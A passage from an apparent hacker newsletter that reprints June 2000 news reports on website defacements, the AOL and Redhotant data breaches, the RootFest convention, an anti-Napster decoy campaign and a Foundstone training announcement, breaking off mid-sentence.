      reopened in April apparently with the help of a US-based Chinese group. 

      Undeterred, Mr Huang went further late last month and began to post news 
      related to the 1989 democracy movement on the Web site, until his arrest 
      on Saturday. 
      
      @HWA
      
272.0 [IND] Hacker's Humorous Tips to Websites
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 13/14 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061400a_j.shtml     
      
      6/14/00
      Hacker's Humorous Tips to Websites
      
      KUALA LUMPUR: In a somewhat amusing vein, "Xenophoria,'' the hacker who 
      hacked into anti-reformasi websites, went online yesterday to offer tips 
      to pro-reformasi websites to protect them from being hacked.

      In a letter to Malaysiakini, Xenophoria advised the pro-reformasi 
      webmasters to stop using the US-based Tripod service to host their 
      websites.

      Saying the tripod.com security system was "rather weak,'' he added: "If 
      Junior Hacker, who breached the Laman Reformasi website, found a hole in 
      tripod.com, there is every possibility that other pro-reformasi websites 
      would suffer the same fate.

      On Friday, the popular Laman Reformasi, also known as Mahazalim, was 
      hacked by someone who called himself "Junior Hacker,'' who posted an 
      obscene picture of a man sodomising another.

      This was an apparent reference to Datuk Seri Anwar Ibrahim, who is 
      currently undergoing trial for allegedly committing sodomy.

      Tripod then cancelled the website's membership, stating that "storing 
      adult content'' was in clear violation of the terms of service agreement.

      In the letter, Xenophoria said he had himself proven the tripod.com 
      security system was rather weak by hacking the http://bnlist.com website. 

      
      Tuesday, June 13, 2000
      http://www.thestar.com.my/online/newsreport.asp?file=/2000/6/13/nation/1304szpa.asp&newspage=nation 
      
      The Star      
            
      @HWA
      
273.0 [IND] r00tfest 2000: Computer Hackers Ride into Town Today
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 14 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061400b_j.shtml     
      
      6/14/00
      http://www.pioneerplanet.com/yhoo/mtc_docs/020426.htm 
      
      Computer Hackers Ride into Town Today
      RiverCenter is site for `RootFest 2000' 
      
      
      --------------------------------------------------------------------------------
      LESLIE BROOKS SUZUKAMO STAFF WRITER 
      --------------------------------------------------------------------------------
      
      It's billed as the Midwest's largest computer security convention, but 
      when the three-day RootFest opens in St. Paul's RiverCentre today, think 
      of it simply as hackers' heaven.

      Heaven, after all, is supposed to be fun, and, in this case, for good 
      hackers. And that's what RootFest hopes to promote -- hackers as the guys 
      in the white hats who actually improve security on the Internet as they 
      light up brain cells and hard drives trying to poke holes in computer 
      security systems.

      ``A lot of the mainstream press and the public at large view hacking as 
      synonymous with criminal activity. They believe every hacker is a criminal 
      and that's just not true,'' said Michael Monson, RootFest's founder and 
      organizer.

      ``Hacking isn't just about breaking into computers,'' Monson said. 
      ``Hacking is about learning and making computers do things they were not 
      originally designed to do -- taking it a step further.

      ``Making a program run faster or use less power would be a good hack,'' he 
      said, as an example.

      Monson is a hacker. He's 21, soft-spoken and wears a goatee, a tiny silver 
      stud in each earlobe, and a skinny ponytail over the collar of his neat 
      white polo shirt and khaki slacks. No one online knows him as Monson, 
      though.

      Instead, he's Lothos, named after the head vampire character from the 
      ``Buffy the Vampire Slayer'' movie, and a member of the Legions of the 
      Underground, a worldwide hackers community in cyberspace. He's also a 
      computer network security engineer.

      He said it was two years ago when he conceived of RootFest with ``root'' 
      -- in this case -- referring to a starting directory in a computer. He had 
      heard about Defcon, another larger, older hacker convention held annually 
      in Las Vegas, and thought, ``That's pretty cool. I wish I could go.''

      He figured there were other hackers from the Midwest who couldn't afford a 
      junket to Vegas, so he threw together the first RootFest at the 
      Minneapolis Convention Center last spring. That effort attracted 200 
      people, primarily from the Midwest, but also from as far away as 
      California and the Netherlands, he said. It's estimated that up to 1,000 
      may attend this year.

      The first convention also attracted attention, not all of it positive. The 
      head of Minneapolis' information technology systems put out an e-mail that 
      warned city computer users to be extra careful while the hackers were in 
      town.

      ``Sometimes, these individuals hack into computers to perform fairly 
      harmless computer pranks; however, that is not always the case,'' warned 
      Don Saelens, the chief information officer for the city of Minneapolis.

      No trouble was reported, however. Saelens said recently that he was 
      responding to the fears of department heads who had heard about the 
      convention ``and tend to respond a little emotionally.''

      The 50-year-old information chief said his younger ``tool-smart'' staffers 
      especially enjoyed the convention. Some of them even participated in the 
      hacking contest, in which contenders lug their home computers into the 
      convention center, plug into a network closed off from the Internet and 
      try to hack into other contestants' computers.

      ``They really loved talking tech with each other,'' Saelens said.

      Jim Kavaloski, director of information services for Ramsey County, said he 
      is not concerned about the hackers hitting town. The county already uses 
      state-of-the-art anti-virus software for its 2,900 personal computers, he 
      said.

      ``When we talked about it, we asked ourselves what we could do and really, 
      there's nothing more you can do,'' Kavaloski said, adding, ``The iloveyou 
      virus came from the Philippines, after all. They don't need to be in St. 
      Paul.''

      Monson hopes law enforcement and computer security experts mingle with 
      hackers and exchange ideas. Some security experts like himself once were 
      hackers who thrilled to the challenge of penetrating a system in the same 
      way that mountain climbers try to scale tall peaks -- because they are 
      there.

      John Edwards, a special agent with the Minnesota Bureau of Criminal 
      Apprehension who specializes in computer crimes, agrees that not all 
      hackers are malicious.

      ``The Bill Gateses and Steven Jobs of the world built all these computer 
      companies, but they were once hackers,'' he said.

      Sgt. Brook T. Schaub of the St. Paul Police Department, another computer 
      crime specialist in the sex crimes unit, also divides hackers into the 
      ``white hats'' and ``black hats'' -- those who pierce security systems and 
      may install a banner announcing they were there and those who break into 
      systems to wreak havoc or steal private data like credit card numbers.

      However, Schaub noted that even white hats who hack simply for the joy of 
      solving a difficult puzzle are committing, at the very least, a 
      misdemeanor when they break into a system. Black hat hackers can receive 
      up to 10 years in prison for felony break-ins that cause more than $2,500 
      in damage, he said.

      Most hacking crimes go unreported, the officers said, because companies 
      are not eager to reveal system vulnerabilities or scare their customers. 
      Edwards estimates 80 percent of computer crime is committed by disgruntled 
      employees or former employees, not outside hackers.

      Monson said he and other hackers condemn destructive attacks such as those 
      earlier this year that shut down systems serving sites like eBay and 
      amazon.com. He hopes the convention will earn the hackers respect.

      ``I hope so,'' he said. ``I believe it will happen.'' 
      
      
      
      --------------------------------------------------------------------------------
      Leslie Brooks Suzukamo can be reached at lsuzukamo@pioneerpress.com or at
      
      (651) 228-5475.
      
      
      Hackers, crackers and script kiddies Not every hacker is a cracker, and all 
      have a disdain for script kiddies. Here's a short ``who's who.'' 
      
      Hacker. Someone who picks apart a computer system and delights in the intricacies.
              Sometimes, a hacker penetrates a computer's security system just to test 
              the system's integrity, then notifies the owner of holes the system. Other
              hackers tinker with systems the way hot-rodders tinker with cars, souping 
              them up to run faster, smoother or use less power. 
      
      Cracker. A term most hackers use for hackers who specialize in penetrating or 
              ``cracking'' into a computer system. Often, this term refers to hackers with
               malicious intent who attempt to wipe out data or steal it. 
      
      Script kiddie. A term of derision used to describe hackers/crackers who break into
              computer systems, not by writing their own computer code, but by copying 
              prewritten code they find on the Internet. Most are young or don't have the
              skills needed to hack into a system by themselves. 
      
      @HWA
           
xx.x [IND] June 19 Hackers Steal Subscriber Data From AOL Network
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 19 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061900a_j.shtml     
      
      6/19/00
      Hackers Steal Subscriber Data From AOL Network
      By Ariana Eunjung Cha, Washington Post Staff Writer
      WASHINGTON, D.C., U.S.A.,
      19 Jun 2000, 12:07 PM CST
      
      Hackers broke into America Online Inc.'s computer network this week and pilfered 
      information such as names, addresses and credit-card numbers from some subscribers,
      company officials said late yesterday.
      
      AOL spokesman Rich D'Amato said only "a very limited" number of the records of the
      company's more than 23 million subscribers had been accessed and that the company 
      had begun contacting those customers directly. He said AOL was working with law 
      enforcement officials to investigate the matter.
      
      "We are taking these claims very seriously," he said. "We employ the highest level
      of security and we have already deployed additional security to prevent this from 
      happening again."
      
      D'Amato said hackers first compromised some employee accounts by tricking them into
      downloading a Trojan horse program that allowed them to hijack the accounts. They 
      then used those customer service accounts to access subscriber data.
      
      News about the security breach was posted Thursday on the Observers.net Web site, a
      popular gathering place for current and former employees and volunteers of AOL, and
      spurred the company's investigation, D'Amato said. The Observers.net site said 
      information was stolen from about 500 subscribers.
      
      Kelly Hallissey, one of the Observers.net site's administrators, said yesterday that
      the trouble began about a week and a half ago inside one of the Internet's original 
      chat rooms. She said 20 to 30 people were in the chat room when one of them started 
      bragging about how he could break into AOL. When challenged, he offered step-by-step
      instructions on how to get into the company's Customer Relations Information System.
      
      "Someone ran his mouth and the next thing I knew everyone was talking about how to 
      break in," she remembered.
      
      On Thursday, Hallissey said she logged on to find several e-mails with screen shots
      of her own records, including the entire credit-card number she had used to sign up
      to AOL.
      
      AOL's status as the world's largest online service makes it a popular target for 
      hackers. Last October, a teenager pleaded guilty to altering data and programs on
      AOL's internal systems, which would cost $50,000 to fix.
      
      Mark Chen, chief technology officer at Palo Alto, Calif.-based Securify.com, said 
      the latest attack on AOL was fairly simple but deadly, because once someone gets 
      through the security perimeter, he has access to "all the powers of a person on 
      the inside."
      
      A Colorado Springs teen who goes by the online moniker Ytcracker--and was one of
      the authors of the Observers.net posting--said he is part of a group of seven young
      men who spend their time probing the vulnerabilities of AOL's vast network.
      
      "It's a pretty interface and it looks secure enough. But when you dig down deep, 
      there is a lot of stuff you can compromise," he said in an interview. 
      
      
      
      
      @HWA
      
274.0 [IND] UK Watchdog Warns Net Banks Over Hackers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 20 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062000a_j.shtml
      
      6/20/00
      UK Watchdog Warns Net Banks Over Hackers
      By Sylvia Dennis, Newsbytes
      LONDON, ENGLAND,
      20 Jun 2000, 7:24 AM CST
      
      The Financial Services Authority (FSA), the UK's financial services regulator, has 
      told banks that they must take more care with their online security.
      
      The warning comes after the FSA found inadequacies in defense systems against hackers
      on the sites of several unnamed UK Internet banks.
      
      Speaking on Monday at the British Bankers Association, Howard Davies, the chairman of
      the FSA, said that online banks also need to pay more attention to strategy and to coping
      with unexpectedly large numbers of users.
      
      Davies added that the FSA's research had identified the key risks that banks must manage 
      as they introduce and develop their e-banking services.
      
      He said that there is a definite need for senior management to be firmly in charge of 
      their Internet strategies, as well as to effectively manage their security risks.
      
      In his speech, he also outlined the reputation risks of rushing products to the market 
      too early, with the result that online users became frustrated with problems they encounter.
      
      Davies added that there is also a strategic and business risk with online banking services.
      Senior management, he said, needs to be firmly in charge of the direct effects of their 
      Internet strategies, and of the potential indirect effects on the underlying profitability 
      of their business
      
      "There is a risk that people with strong technological, but weak banking skills can end up 
      driving e-initiatives. One consequence may be that these initiatives do not attract the 
      types of customers that banks want or expect, and may have unexpected implications for 
      existing business lines," he said.
      
      "Banks may face new competition too. E-banks are easy to set up, so lots of new entrants are
      arriving on the scene. And old-world systems, cultures and structures do not encumber these 
      new entrants," he added.
      
      This issue, he went on to say, was closely linked to business risk, key elements of which, 
      such as the ability to assess credit and liquidity risk, present themselves in new guises in
      an e-banking world.
      
      The good news for the e-banking world, Davies told his City audience, is that UK banks have 
      found little evidence of material success for hackers.
      
      "This suggests that, for the moment, they have in place sufficiently robust barriers to repel
      attacks attempted on their gateways," he said, adding that banks should be careful not to get
      too confident about the issues involved.
      
      "While banks tend to have reasonable perimeter security, we have sometimes found insufficient
      segregation between internal systems, and poor internal security. So we are encouraging banks
      to look at the firewalls between their different systems to ensure adequate damage limitation
      should an external breach occur," he said, adding that, as ever, the greatest threat so far 
      has been from the enemy within.
      
      Davies said that it is now very difficult in the Internet environment to predict and manage 
      the volume of customers that e-banks will obtain.
      
      Many banks going online, he said, have significantly misjudged volumes, usually making estimates
      which turn out to be too cautious.
      
      "When a bank has inadequate systems to cope with demand there may be both financial and reputational
      damage, and even compromises in security," he said.
      
      The FSA's Web site is at http://www.fsa.gov.uk . 
      
      @HWA
      
275.0 [IND] Hacker Attacks Gun Control Group's Web Site
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 21 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062100a_j.shtml     
      
      6/21/00
      Hacker Attacks Gun Control Group's Web Site
      By Martin Stone, Newsbytes
      WASHINGTON, DC, U.S.A.,
      21 Jun 2000, 7:34 AM CST
      
      The Web site of nonprofit gun-control group Violence Policy Center was 
      reportedly attacked by an apparently pro-gun hacker who left the message, 
      "If you take my guns, I still have my computer. VPC just got shot in the 
      head."

      An Associated Press report today said the site was also defaced with 
      images of bombs, a skull and crossbones and obscenities. In addition, the 
      report said, all of the groups e-mail had been rerouted to the hacker.

      The intrusion was discovered Monday and reported to the FBI, according to 
      the report. The group's domain name registrar, Network Solutions Inc. of 
      Herndon, Va., was asked to restore the VPC Web address. Network Solutions 
      said the process would take 12 to 24 hours.

      AP said that public Internet registration records showed the "vpc.org" 
      name to be registered to a Ted Torian, which appeared to be an alias, at 
      an address in Los Angeles. VPC said it has no knowledge of that name, and 
      though the group has a Los Angeles office, it's not at that address and 
      the phone numbers listed on the registration records are not in service.

      An e-mail apparently intercepted by the hacker had been rerouted to an 
      anonymous Yahoo mail account and the AP said investigators discovered the 
      account had been accessed through a computer at the University of Nebraska
      at Lincoln. 
      
      @HWA
      
276.0 [IND] Hackers Attack Nike, United Arab Emirates Sites
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      June 22 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062200a_j.shtml
      
      6/22/00
      Hackers Attack Nike, United Arab Emirates Sites
      By Martin Stone, Newsbytes
      MONTREAL, QUEBEC, CANADA,
      22 Jun 2000, 7:07 AM CST
      
      Hackers struck at two prominent Web sites Wednesday, one belonging to 
      sportswear giant Nike Corp. in an apparent attempt to disrupt an economic 
      forum in Australia, the other operated by the government of the United 
      Arab Emirates.

      An Associated Press report today said officials at Nike notified the FBI 
      after discovering a hacker had diverted access from its Web site to a site 
      devoted to disrupting an international economic forum in Australia. The 
      report said Nike computers were never breached and its electronic security 
      protected all online customers.

      A Reuters report today said a British man is in custody under suspicion 
      for hacking into the UAE Internet system. He faces charges of damaging the 
      country's economy, according to local newspaper reports today. Reuters 
      said the 26-year-old man, a senior computer engineer in Dubai, was 
      arrested last week after being traced by Emirates Telecommunications Corp. 
      (Etisalat) security staff.

      The reports cite Dubai police chief Major General Dhahi Khalfan Tamim as 
      saying the unidentified Brit could be charged with damage to the UAE 
      economy if shown he destroyed data in the Web system. Dubai does not have 
      specific computer crimes laws, but the suspect could receive up to 10 
      years in prison, the reports said.

      Reuters said Etisalat officials blame the suspect for much of the 
      disruption experienced by local Web users in the past two weeks. Dubai has 
      been pushing to become a regional hub for information technology and 
      electronic commerce and last year invested $200 million in establishing an 
      e-commerce and IT free-trade zone, called Dubai Internet City.

      Associated Press said that for six hours access to the Nike site was 
      diverted through computers operated by various Internet service providers, 
      including FirstNET Online in Edinburgh, Scotland, to the destination, 
      http://www.s11.org, a page proclaiming "Global justice is coming - prepare 
      now!" The page also included messages urging protesters to gather Sept. 
      11-13 at the World Economic Forum in Melbourne, Australia.

      The s11 Web site uses British spellings and describes itself as part of
      a "network of organisations, affinity groups and individuals that all share
      a common concern about the growth of corporate power and the direction of 
      globalisation," the AP report said. 
      
      @HWA
      
277.0 [IND] Rock Band's Answer To Napster: Sabotage
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 22 2000
      Source: www.infowar.com
      http://www.infowar.com/hacker/00/hack_062200b_j.shtml
      
      6/22/00
      Rock Band's Answer To Napster: Sabotage
      By Kevin Featherly, Newsbytes
      OAKLAND, CALIFORNIA, U.S.A.,
      22 Jun 2000, 12:42 PM CST
      
      From the left bank of the US, Oakland, Calif., there is fomenting a plot 
      to overthrow the much-blasted Napster music file-sharing system - by using 
      Napster against itself.

      A Web site belonging to the obscure Clash-meets-Lou-Reed rock combo The 
      Tabloids (http://www.stopnapster.com ), is publicly campaigning for 
      guerrilla tactics against the MP3-swapping service that many contend is 
      violating artists and record labels' copyrights by allowing users to give 
      music to each other without paying for the pleasure. And the plan, 
      according to the site, is sabotage.

      The site encourages anti-Napsterites to use Napster itself to send out 
      "Trojan Horses" and "Napster bombs" to disrupt the service - while causing 
      no harm to anyone's computer.

      "Here's a suggestion for making effective electronic counter measures that 
      thwart MP3 file sharing in violation of copyright laws," said the site, 
      which is registered to Tabloids lead singer, songwriter and guitarist 
      Michael Robinson. "From now on, prerecorded music is released in two 
      digital formats: the original compact disc as well as Trojan Horse MP3 
      files, which are non-destructive, digital decoys."

      The result? Say a user downloads one of Eminem's new releases. They are 
      happily listening to the purloined tune when suddenly Charleton Heston 
      begins reading a public interest message opposing song theft. "The Trojan 
      Horse does nothing to hurt your hard drive, computer or files," the site 
      says. "But it's annoying."

      The effort has done very little to ingratiate the band with hardcore 
      Napster users, who have taken to online chat sessions in droves to decry 
      the band's technological short-sightedness and to accuse Robinson and crew 
      of exploiting the Napster controversy to put their little-known band in 
      the public eye.

      All of which, Michael Robinson says, couldn't matter less.

      "My wife and I sat down and just went through all of the objections that 
      people would have," Robinson told Newsbytes this morning. "It's like a 
      ping-pong ball hitting a tank as far as I'm concerned. It doesn't hit me, 
      I don't care, because really, ultimately, I have a history of speaking out 
      on issues."

      True enough. Robinson is not your average high school dropout who formed a 
      punk-rock group. He is a former journalist, a professional photographer, 
      and a published author whose now out-of-print 1990 book, "Overdrawn," took 
      on the late 1980s savings and loan crisis.

      "The constitutional aspect of this is really what is driving me more than 
      anything else," he said. "I thought about it long and hard, my wife and I 
      went through a lot of skull sessions. And I'm not going to sit on the 
      sidelines of this fight."

      As for accusations that he is engaging in a publicity stunt, Robinson has 
      this retort. "They can think whatever they want; it doesn't matter or 
      phase me. My default is that I'm amazed by the implications of this. If 
      you think about it, if this Napster thing continues, then everything is up 
      for grabs. Your song can be used on a soundtrack without your permission, 
      Coca-Cola could use your songs in an advertisement. If you don't put this 
      as a Maginot Line right now, where does it go? What about patents, what 
      about authors, what about photographers?"

      The issue arises at a time when the industry, and some artists, are 
      pulling together to take aim at music file-sharing, and Napster is the 
      target's bull's-eye. The Recording Industry Association of America, 
      representing a number of major record labels, is suing the service and 
      seeking to shut it down. The Wall Street Journal reported today that a 
      group called Artists Against Piracy, also backed by the labels, is 
      planning an anti-Napster media blitz this summer.

      Robinson, who says he is not affiliated with the major labels, said his 
      target is not primarily Napster users themselves, but political leaders 
      whose job it is to shape and create laws, and to protect the old ones. 
      Robinson cites the US Constitution's Article 1, Section 8, as proof that 
      the activity Napster and its users are engaging in is illegal and 
      unconstitutional. That section says Congress shall have the power "to 
      promote the progress of science and useful arts, by securing for limited 
      times to authors and inventors the exclusive right to their respective 
      writings and discoveries."

      A survey released yesterday indicated that Napster users do not agree. The 
      nationwide survey of 300 adults who download music off the Internet 
      conducted by Connecticut-based market research firm InsightExpress, 
      indicates that nearly half of Napster users surveyed feel the service does 
      not violate federal copyright statutes. And more than half feel they are 
      not themselves guilty of violating copyright law when using Napster.

      Again, Robinson is unmoved. "It's not for the great unwashed to decide 
      what's in my best interests," he said. "Ten million people should not have 
      the technological weapon to rip off thousands of other people who do not 
      have the technology to combat them. That's not what America stands for."

      Likewise, frequent arguments that Napster and its many clones actually 
      drive sales because they expose people to music they never heard before - 
      an argument given weight by a recent study of 17,000 users by Yankelovich 
      Partners Inc. - also are meaningless to Robinson.

      "I feel like it's not for a group of people to look at some survey and 
      say, 'Hey, it's going to be good in the long run,'" the musician said. 
      "It's not their right to make that decision. It belongs to the copyright 
      holder. It's their decision and no one else's."

      And he is unswayed by prevailing arguments from people like Public Enemy 
      rapper Chuck D., holding that Napster represents a technological tide 
      cannot be turned.

      "That's the thing about the technology. But just because the cops can tap 
      your phone doesn't mean they should," Robinson said. "One of the things 
      that's implicit in the site is we're asking for legislation. We're trying 
      to raise the constitutional issue. We're saying you can't just get rid of 
      (copyright protections) because it's inconvenient. We as a nation have got 
      to come to some sort of consensus on this."

      The Stop Napster site is online at http://www.stopnapster.com . 
      
      @HWA
      
278.0 [IND] Pro-gun Hackers Take Over Web Site
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 26 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062600a_j.shtml
      
      6/26/00
      Pro-gun Hackers Take Over Web Site
      
      For a while at least, the 10 or so employees of the Violence Policy Center 
      tried to remain blas after their Web site was hijacked Monday by anti-gun 
      control hackers, their usual home page replaced by a clunky gray box with 
      a bomb and a skull and crossbones.

      Josh Sugarmann, VPC's executive director, figured the site could be 
      restored in a matter of hours, and refrained from trying to fix the site 
      in order to "leave the crime scene untouched" for the FBI. Tuesday, 
      however, he learned that the cyberterrorists didn't just hack on to their 
      site, linking to pro-gun groups, erasing mountains of data (which VPC 
      luckily had saved) and gloating onscreen about getting rid of VPC's 
      "propagandist bullshit." They also stole the group's Web identity.

      Apparently, the hackers figured out a way to actually take over access to 
      the site, which is licensed to VPC by Network Solutions. So until 
      Sugarmann finds out how to wrest control away from them, the hackers are 
      masters of the group's domain. That includes incoming e-mail to VPC from 
      its Web address, which makes Sugarmann concerned for the safety of the 
      senders.

      Then, in more bad news, the FBI told Sugarmann that the hacking doesn't 
      become a blip on the FBI's radar screen until the group can prove it has 
      incurred $5,000 in damages -- a serious hurdle for a nonprofit 
      organization, because its losses are largely confined to the labor 
      required to fix the hacking mess. Its product is information, which it 
      gives away for free, so assessing damages becomes a guessing game. "These 
      are standards that are put in place for for-profit entities," he said.

      VPC is a fairly frequent target of gun advocates -- and vice versa. The 
      group is a rising star among gun control groups, most recently scrapping 
      with the NRA over its feathered and kid-friendly mascot, Eddie Eagle, and 
      its plans for a Times Square theme restaurant. In turn, the NRA has taken 
      personal swipes at Sugarmann, and the pro-gun press repeatedly lambastes 
      him and his group.

      In a way, the attack may have been inevitable. Sugarmann says gun 
      advocates have always been pioneers in communication technology. "They 
      were the first to use computer bulletin boards, they were the first to use 
      the Web, they were the first to use blast fax," he said. "They are way 
      ahead of organizations on our side of the issue."

      Gun advocates have cloned gun control sites in the past. 
      Handguncontrol.net, a pro-gun site, mirrors the anti-gun 
      Handguncontrol.org, just as Center for the Prevention of Handgun Violence 
      has its own doppelganger. VPC seemed immune to these attacks, since the 
      likely addresses -- vpc.net and vpc.com -- are owned by groups unrelated 
      to the gun issue.

      Gun rights activists may not settle for cloning anymore. According to 
      Sugarmann, those groups could now start aggressive hack attacks against 
      other anti-gun organizations, having been emboldened by their temporary 
      triumph over VPC. "In pro-gun cyberspace," he says, "this is a big 
      victory."

      By Alicia Montgomery
      June 21, 2000
      
      http://www.salon.com/politics/feature/2000/06/21/guns/index.html 
      
      Pro-gun hackers take over Web site
      And a prominent group of gun critics is still trying to get it back.
     
      About the writer
      Alicia Montgomery is an assistant editor in Salon's Washington bureau. 
      
      @HWA
      
279.0 [IND] Hacker Taps Into 24,000 Credit Cards
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      6/26/00
      Hacker Taps Into 24,000 Credit Cards
      Maurice Chittenden June 25 2000 BRITAIN
      
      A COMPUTER hacker has breached the security of a pioneering internet 
      service provider to obtain the names, addresses, passwords and credit card 
      details of more than 24,000 people.

      The victims include scientists at the top-secret Defence Evaluation and 
      Research Agency, senior officials in the government, BBC bosses and 
      executives at companies such as Shell, Barclaycard and Halifax.

      The hacker, an information technology consultant, says that he targeted 
      Redhotant to expose security lapses.

      The Kent-based company is at the forefront of a new style of internet 
      provision: subscribers pay as little as 30 a year for unlimited access to 
      the web with no additional phone charges. It aims to attract half a 
      million users in Britain, but its critics say it is failing to cope with 
      demand.

      Trading standards officers are investigating complaints that people have 
      had difficulty getting online, although the company claims to have a line 
      for every nine customers.

      The company, which has taken up to 1.5m in subscriptions, says it plans 
      to double capacity. Last week it was offline for several days and blamed a 
      technical hitch after a thunderstorm.

      The consultant who obtained the details of Redhotant's subscribers broke 
      the data protection law but says he did it only out of public interest to 
      highlight lack of security.

      He used a proxy, a device normally used for disguising the identity of a 
      user, as an intermediary to search the site for files.

      Among them he found the customer database. Only those connected to the 
      company's internal network are supposed to access it. The hacker got 
      around this by typing in: "referrer: the intranet site".

      He said: "It was child's play. I didn't actually need to hack in the 
      normal sense because I didn't need any passwords. It was like rooting 
      around in bins for a key and then finding there was a wide-open side 
      entrance.

      "Redhotant's biggest mistake was keeping its own records on the same disk 
      and machine as all its services."

      He added: "I sent them a couple of e-mails alerting them to the problem 
      but they ignored it. The lesson is simple. Don't put anything on a website 
      that you wouldn't put on a billboard."

      Redhotant is part of the Jak internet group, which operates from offices 
      near the Channel Tunnel in Kent.

      Kevin Packwood, a director, said he was unaware of the security breach. He 
      said: "I would be very surprised if somebody could get that far. Our 
      security measures should have been able to see it happening and alarms 
      would have sounded."

      http://www.the-times.co.uk/news/pages/sti/2000/06/25/stinwenws01002.html 
      
      
      @HWA
      
280.0 [IND] Etisalat Vows to Prosecute Internet Hackers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 28 2000
      www.infowar.com
      
      http://www.infowar.com/hacker/00/hack_062800a_j.shtml
      
      6/28/00
      Etisalat Vows to Prosecute Internet Hackers
      
      DUBAI (Reuters) - United Arab Emirates telecoms firm Etisalat has vowed to 
      prosecute hackers into the country's Internet system and described as 
      ``baseless'' lawsuits by a Briton alleged to have disrupted online 
      services earlier this month.

      ``It is appalling to think that any of these 'hackers' can infiltrate a 
      computer security system and cause absolute chaos with direct economic 
      consequences,'' Etisalat's lawyer, Hamad Kadfoor al-Mehairi, said in a 
      statement received by Reuters on Wednesday.

      ``We have a duty at Etisalat and the government of the UAE to safeguard 
      the confidentiality of our customers to ensure complete trust in the 
      system. We will not hesitate in prosecuting anyone who abuses the 
      system,'' he added.

      Lee Alan Ashurst, 21, of Manchester, suspected by Etisalat officials of 
      hacking and blamed for disruption experienced by some local Internet 
      subscribers earlier this month, has denied the accusations and said he had 
      filed lawsuits for defamation and damages against Etisalat.

      ``I have no idea what they (Etisalat) are talking about, I am being used 
      as a scapegoat,'' Ashurst told a news conference on Monday.

      ``I have lost my job, my company car and apartment as a result of these 
      accusations and I am suing Etisalat for defamation and damages,'' he 
      added.

      Mehairi said Etisalat viewed the lawsuit as ``baseless and simply a 
      diversionary tactic.''

      Mehairi said hacking into the Internet system endangered electronic 
      commerce in the UAE and was punishable under the law by up to ten years in 
      jail.

      Dubai is trying to build on its reputation as a regional trading hub to 
      attract international information technology firms to set up bases at a 
      $272 million free trade zone for electronic commerce scheduled to open 
      later this year.

      Local media on Monday quoted Dubai's Attorney General Ibrahim abu Melha as 
      saying a committee of computer experts was looking into the case and would 
      examine statements from both Etisalat and Ashurst.

      ``Once the technical report is made public, the seriousness of the crime 
      would be obvious. Although many of the younger generation view the 
      Internet as a challenging game or pastime, we have to protect the 
      commercial interest of the United Arab Emirates,'' Mehairi said. 
      
      @HWA
      
281.0 [IND] Foundstone's Ultimate Hacking Course Available at Black Hat Briefings
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 28 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062800b_j.shtml      
      
      6/28/00 
      
      Company Press Release
      Foundstone's Ultimate Hacking Course Available at Black Hat Briefings
      'White Hat' Consultants Offer Popular Computer Security Training July 24-25
      IRVINE, Calif.--(BUSINESS WIRE)--June 28, 2000--Foundstone Inc., the 
      leading ``white hat'' computer security training and consulting company, 
      and Black Hat Briefings today announced that Foundstone's Ultimate 
      Hacking: Black Hat Edition course will be offered July 24-25 in 
      conjunction with the Black Hat Briefings 2000 conference in Las Vegas that 
      week.

      The latest addition to Foundstone's renowned security training program, 
      Ultimate Hacking: Black Hat Edition is an intensive, hands-on course 
      designed for system administrators, network engineers, and others who work 
      at the ``front lines'' protecting their organizations from hacker attacks.

      Scheduled for the two days preceding the Black Hat Briefings, the course 
      is a complement to the annual gathering of corporate and ``underground'' 
      security specialists. ``The top security professionals from around the 
      world come to the Black Hat Briefings to mingle with the enemy,'' said 
      George Kurtz, Foundstone CEO. ``They come because they know in order to 
      protect a network, they must understand how a hacker works. And that's 
      what Ultimate Hacking will show them.''

      In Ultimate Hacking: Black Hat Edition, course participants will learn 
      from Foundstone's all-star team of experienced security professionals, 
      including the co-authors of Hacking Exposed: Network Security Secrets and 
      Solutions. Written by the company's founders, this best-selling guide 
      exposes hacker techniques and methods to defend against them.

      ``I strive to put together the best security conferences and pre-show 
      training that I can,'' said Jeff Moss, Founder and President of Black Hat, 
      Inc. ``To meet that expectation, we have partnered with Foundstone. Not 
      only can they walk the walk, but collectively they have years of 
      experience in breaking into Corporate America and defending against hacker 
      threats.''

      Ultimate Hacking: Black Hat Edition training will take place in a fully 
      configured classroom lab to dramatically illustrate the critical 
      vulnerabilities in Windows and Unix systems and the latest countermeasures 
      for them. ``The best way for participants to gain this knowledge and 
      sharpen their skills is to 'learn-by-doing' in a hands-on environment,'' 
      said Kurtz.

      Topics covered will include ``Assessing and Penetrating NT and Unix 
      Networks and Hosts'', ``Securing NT and Unix Hosts'', and ``Identifying 
      Common E-Commerce Web Vulnerabilities''.

      To sign up for Ultimate Hacking: Black Hat Edition, interested persons 
      should visit the Black Hat web site at www.blackhat.com.

      About Foundstone

      Foundstone Inc., headquartered in Irvine, California, is the premier 
      computer security training and consulting company. Foundstone's team of 
      experts have thwarted hackers for years at the highest corporate and 
